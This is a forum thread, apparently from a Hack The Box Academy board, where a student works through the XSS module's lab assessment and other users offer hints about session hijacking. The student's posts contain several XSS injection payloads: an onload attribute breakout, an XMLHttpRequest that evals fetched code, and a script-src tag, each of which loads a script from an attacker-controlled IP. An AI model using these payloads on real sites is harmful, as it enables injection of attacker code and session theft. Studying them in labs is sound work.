Academy HTB - XSS module Final Assessment

D3vil0p3r · December 14, 2021, 5:14pm

Hello everyone!
I’m getting stuck with the Final Assessment of XSS modue on Academy HTB.

Apart that the target website does not store comments anymore, I don’t know why (I tried also to reset the machine but I get always the same target IP address), I approached the problem in the following way:

On the index page, at http://10.129.222.0/assessment/index.php, I have one only search input. I tried to inject any XSS payload and I get a message like “Results for “”” so it is like it does not filter my input even if nothing is triggered.

Then, I moved to welcome-to-security-blog page, where I can see different input forms: Comment, Name, Email, Website.

Among these forms, Email form requires to have an email pattern, and Website form adds “http://” at the beginning of the text I inject, so I would exclude these two forms.

Analyzing Comment and Name form, I noted that they filter the inputs so I guess one of them should be vulnerable. My suspicious focuses more on Name where the filter deletes all contents between “<” and “>”, so my solution was to encode the “<” char as “<”. With this approach, when I publish (and check for store) the comment, the Name with my XSS injection text is entirely shown, and Name value is linked with Website form. Anyway, despite this, when I use payloads like alert() or src=http://myIP:PORT/script.js (by running a listener on PORT on my machine) I don’t get anything. Of course I tried this approach also for Comment form.

Is my current approach correct or am I totally wrong? Should I check also other kinds of tags?

Thank you in advance!

donthackme · December 14, 2021, 5:34pm

You are close. Review Session Hijacking, a few times.

D3vil0p3r · December 15, 2021, 2:35am

@donthackme I’m focusing on the page source structure on “Name” field where the html piece of code is:

<p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="TEST" size="30" maxlength="245" required='required' /></p>

so the input text will be inserted in “value” variable. At this point, I tried to use onload event for executing javascript code by giving as input the following:
" onLoad="javascript:eval('var a=document.createElement(\'script\');a.src=\'http://10.10.14.220:8081/script.js\';document.body.appendChild(a)')
The HTML page source piece of value will be the following:

<SNIP...> value="&quot; onload=&quot;javascript:eval(&#039;var a=document.createElement(\&#039;script\&#039;);a.src=\&#039;http://10.10.14.220:8081/script.js\&#039;;document.body.appendChild(a)&#039;)" size="30" maxlength="245" required='required' /></p>

but on my listener I don’t get anything.

I tried another approach by thinking: ok, not only “Name” field but also “Website” field can be stored so I can store a script tag content in “Website” field and call the related function in “Name” field, so in “Name” I typed: " onload="b() while in “Website” I typed "/><script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//10.10.14.220:8081/script.js");a.send();</script> but also in this case with no luck.

I also tried simply on “Name” field the following "><script+src=http://10.10.14.220:8081/script.js></script> but in this case the main issue I see is the structure of resulting HTML piece of code:

<SNIP...> value="&quot;/&gt;&lt;script+src=http://10.10.14.220:8081/script.js&gt;&lt;/script&gt;" size="30" maxlength="245" required='required' /></p>

so here I close immediately the value variable and <input> tag with a "/> ("/>) and then I inject my script tag. Here my main doubt is: when I close (</script>) I still have a remaining code of the <input> tag (size, maxlength, required variables). How can I “remove” it? I tried to comment by <!-- (<!--) but does not work (also because I guess it could comment all the remaining html code of the page). I tried to manage this doubt also by declaring a second <input> tag after my </script> tag by typing the following code in “Name” field:

"/>&lt;script+src=http://10.10.14.220:8081/script.js&gt;&lt;/script&gt;&lt;input+id="dumm"+name="dummy"+type="text"+value="

in order to concatenate correctly the remaining size, maxlength and required variables of <input> tag, but also in this case with no luck.
I’m feeling so stupid…

D3vil0p3r · December 16, 2021, 9:18pm

Solved… my “error” was so stupid…

admiralhr99 · December 22, 2021, 12:04pm

hey how are you?how did you solve that?can u explain please?

D3vil0p3r · December 23, 2021, 10:15pm

Hello,
just discard all my analysis here and use port 8080 as listening port on attacker machine. Then you need only to review Session Hijacking section as suggested by @donthackme

Topic		Replies	Views
Cross Site Scripting XSS Skills Assessment Academy skills-assessment	8	2706	July 9, 2024
XSS Assessment comments unstable? Academy	0	50	May 17, 2024
Advanced XSS and CSRF Exploitation - XSS Filter Bypasses HTB Content htb-academy	0	44	September 15, 2024
Academy HTB - XSS Module theorical questions Academy	0	243	December 16, 2021
Cross-Site Scripting (XSS) Skills Assessment Academy	12	2331	September 12, 2023

Academy HTB - XSS module Final Assessment

Related topics